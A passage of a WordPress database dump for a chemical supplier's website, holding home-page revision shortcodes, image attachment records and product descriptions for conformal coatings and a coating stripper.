span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 16:02:54', '2016-08-19 16:02:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (616, 3, '2016-08-19 16:03:56', '2016-08-19 16:03:56', '', 'Arylic coating', '', 'inherit', 'open', 'closed', '', 'arylic-coating', '', '', '2016-08-19 16:03:56', '2016-08-19 16:03:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Arylic-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (617, 1, '2016-08-19 16:05:40', '2016-08-19 16:05:40', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 16:05:40', '2016-08-19 16:05:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (618, 3, '2016-08-19 16:08:07', '2016-08-19 16:08:07', '', 'Varnish coating', '', 'inherit', 'open', 'closed', '', 'varnish-coating', '', '', '2016-08-19 16:08:07', '2016-08-19 16:08:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Varnish-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (619, 3, '2016-08-19 16:29:50', '2016-08-19 16:29:50', '', 'Conformal coating stripper', '', 'inherit', 'open', 'closed', '', 'conformal-coating-stripper', '', '', '2016-08-19 16:29:50', '2016-08-19 16:29:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Conformal-coating-stripper.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (620, 3, '2016-08-19 16:30:51', '2016-08-19 16:30:51', '<h2>MS-460H | Silicone Conformal Coatings</h2>\r\n<h3>Transparent, Flexible, Robust Coatings - MIL-SPEC approved</h3>\r\nMiller-Stephenson Silicone Conformal Coatings ( MS-460H ) is a transparent, soft, flexible MIL-SPEC coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approval. It is also compatible with WEEE and RoHS.\r\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\r\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson\'s MS-460H Silicone Conformal Coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C. An additional benefit of silicone conformal coating is its excellent moisture protection.  Silicones have been used in cases where there were extreme temperature differences, which resulted in excessive moisture.  Other conformal coatings failed within hours or days, while silicone, especially when applied thickly, has been proven to succeed.  One particular application was for electronically controlled heaters developed for artic temperatures.</p>\r\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\r\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\r\n<p class="content">More than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>', 'MS-460H | Silicone Conformal Coatings', 'Miller-Stephenson\'s Silicone Conformal Coating is a transparent, soft, flexible coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approva. It is also compatible with WEEE and RoHS.', 'publish', 'open', 'closed', '', 'silicone-conformal-coatings', '', '', '2017-06-21 15:53:50', '2017-06-21 15:53:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=620', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (621, 3, '2016-08-19 16:31:30', '2016-08-19 16:31:30', '<h2>MS-475C | Acrylic Conformal Coatings</h2>\r\nMiller-Stepheson Acrylic Conformal Coatings offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-475C | Acrylic Conformal Coatings', 'Miller-Stephesons\' Acrylic Conformal Coating offers superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\r\n\r\n&nbsp;', 'publish', 'open', 'closed', '', 'acrylic-conformal-coatings', '', '', '2017-06-21 16:25:18', '2017-06-21 16:25:18', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=621', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (622, 3, '2016-08-19 16:32:21', '2016-08-19 16:32:21', 'MS-452N Varnish Conformal Coating is a special protective coating designed for adverse environmental conditions and offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.  Miller-Stephenson\'s Varnish coating has excellent electrical insulation and moisture/fungus resistant properties making it ideal for use on stators, transformers, field coils, printed circuits, completed electric assemblies, junction boxes and cables.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">Varnish Conformal Coatings</a> are hard, moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability. These products are usually made of lower molecular weight polymers which affect the performance properties and quality of the product.\r\n\r\nhttps://www.miller-stephenson.com/conformal-coating/', 'MS-452N', 'MS-452N Protective Varnish is designed for adverse environmental conditions and offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.  Miller-Stephenson\'s Varnish coating has excellent electrical insulation and moisture/fungus resistant properties making it ideal for use on stators, transformers, field coils, printed circuits, completed electric assemblies, junction boxes and cables.', 'publish', 'open', 'closed', '', 'varnish-conformal-coating', '', '', '2016-10-24 17:04:12', '2016-10-24 17:04:12', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=622', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (623, 3, '2016-08-19 16:32:52', '2016-08-19 16:32:52', '<h2>MS-114D | Conformal Coating Stripper</h2>\r\nMS-114D, Miller-Stephenson\'s Conformal Coating Stripper is specifically formulated to remove most conformal coatings resins.  MS-114D Conformal Coating Stripping agent will dissolve all Silicone Conformal Coatings, Urethane Conformal Coatings, Acrylic Conformal Coatings, and Varnish Conformal Coatings from many types of electronic circuitry. MS-114D safely dissolves these coatings without causing damage to most electronic components and elastomers. It will attack ABS, acrylic and polystyrene. Compatibility with plastic materials should be tested before use.  Benefits of this product include:\r\n<ul>\r\n 	<li>Nonflammable formulation</li>\r\n 	<li>Fast, effective conformal coating removal</li>\r\n 	<li>Safe for printed circuit boards and electronics</li>\r\n 	<li>Contains no ozone depleting chemicals</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\r\n<h3>MS-114D Conformal Coating Stripper is non-flammable and the following standard safety precautions should be observed:</h3>\r\n<ul>\r\n 	<li>Use only in well ventilated areas.</li>\r\n 	<li>Protective gloves and goggles should be worn.</li>\r\n 	<li>In case of prolonged skin contact, wash with water.</li>\r\n 	<li>In case of eye contact, flush with water followed by a diluted boric solution and contact physician.</li>\r\n 	<li>Avoid prolonged breathing of vapours.</li>\r\n 	<li>Unused portions of stripping agent  must be disposed of in compliance with applicable environmental regulations.</li>\r\n 	<li>Consult the Material Safety Data Sheet (MSDS/SDS) for more specific product information.</li>\r\n</ul>', 'MS-114D | Conformal Coating Stripper', 'MS-114D, Miller-Stephenson\'s stripping agent is specifically formulated to remove Miller-Stephenson’s MS conformal coatings.  MS-114D Conformal Coating Stripper will dissolve all Silicone Coatings, Urethane Coatings, Acrylic Coatings, and Varnish Coatings from many types of electronic circuitry. MS-114D safely dissolves these coatings without causing damage to most electronic components and elastomers. It will attack ABS, acrylic and polystyrene. Compatibility with plastic materials should be tested before use.  Benefits of this product include:\r\n<ul>\r\n 	<li>Nonflammable formulation</li>\r\n 	<li>Fast, effective conformal coating removal</li>\r\n 	<li>Safe for printed circuit boards and electronics</li>\r\n 	<li>Contains no ozone depleting chemicals</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'conformal-coating-stripper', '', '', '2017-06-30 15:40:26', '2017-06-30 15:40:26', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=623', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (624, 1, '2016-08-19 16:36:05', '2016-08-19 16:36:05', '', 'millube', '', 'inherit', 'open', 'closed', '', 'millube', '', '', '2016-08-19 16:36:05', '2016-08-19 16:36:05', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/millube.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (625, 1, '2016-08-19 16:37:47', '2016-08-19 16:37:47', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 16:37:47', '2016-08-19 16:37:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (626, 1, '2016-08-19 16:38:57', '2016-08-19 16:38:57', '', 'milsolv', '', 'inherit', 'open', 'closed', '', 'milsolv', '', '', '2016-08-19 16:38:57', '2016-08-19 16:38:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milsolv.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (627, 1, '2016-08-19 16:39:18', '2016-08-19 16:39:18', '', 'milglide', '', 'inherit', 'open', 'closed', '', 'milglide', '', '', '2016-08-19 16:39:18', '2016-08-19 16:39:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milglide.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (628, 1, '2016-08-19 16:40:43', '2016-08-19 16:40:43', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 16:40:43', '2016-08-19 16:40:43', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (629, 1, '2016-08-19 16:41:22', '2016-08-19 16:41:22', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; 